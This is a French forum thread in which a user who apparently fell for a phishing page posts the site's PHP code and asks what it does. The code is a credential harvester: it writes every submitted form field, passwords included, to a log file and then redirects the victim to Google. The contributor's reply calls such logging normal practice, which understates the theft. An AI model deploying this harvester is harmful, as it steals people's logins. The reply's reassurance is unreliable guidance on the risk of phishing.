Code trouvé dans une page phishing
Résolu
Utilisateur anonyme
-
fiddy Messages postés 11069 Date d'inscription Statut Contributeur Dernière intervention -
fiddy Messages postés 11069 Date d'inscription Statut Contributeur Dernière intervention -
Bonjour,
J'ai trouvé un code PHP sur une page de phishing. Je m'en suis rendu compte après avoir cliqué sur connexion. J'aimerais savoir a quoi ce code sert-il, si il permet d'avoir mon pseudo, MDP, mail,.. Merci !
<?php
header (' Location: https://www.google.fr/?gws_rd=ssl ');
$handle = fopen("logs.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
J'ai trouvé un code PHP sur une page de phishing. Je m'en suis rendu compte après avoir cliqué sur connexion. J'aimerais savoir a quoi ce code sert-il, si il permet d'avoir mon pseudo, MDP, mail,.. Merci !
<?php
header (' Location: https://www.google.fr/?gws_rd=ssl ');
$handle = fopen("logs.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
A voir également:
- Code trouvé dans une page phishing
- Code ascii - Guide
- Supprimer une page dans word - Guide
- Code puk bloqué - Guide
- Code activation windows 10 - Guide
- Comment déverrouiller un téléphone quand on a oublié le code - Guide
1 réponse
Bonjour,
Je me demande déjà comment tu as pu avoir le code source php ? oO.
Sinon ce code sauvegarde les variables post dans le fichier logs.txt.
Seule un administrateur du site pourra lire ce fichier (sauf si bien sûr les droits du fichier sont publics dans un répertoire accessible et s'il n'y a pas eu de compromission du site).
En tout cas, c'est une pratique normal de loguer les données. Sauf le stockage en clair du mot de passe. Il faut toujours hacher avec un sel.
Je me demande déjà comment tu as pu avoir le code source php ? oO.
Sinon ce code sauvegarde les variables post dans le fichier logs.txt.
Seule un administrateur du site pourra lire ce fichier (sauf si bien sûr les droits du fichier sont publics dans un répertoire accessible et s'il n'y a pas eu de compromission du site).
En tout cas, c'est une pratique normal de loguer les données. Sauf le stockage en clair du mot de passe. Il faut toujours hacher avec un sel.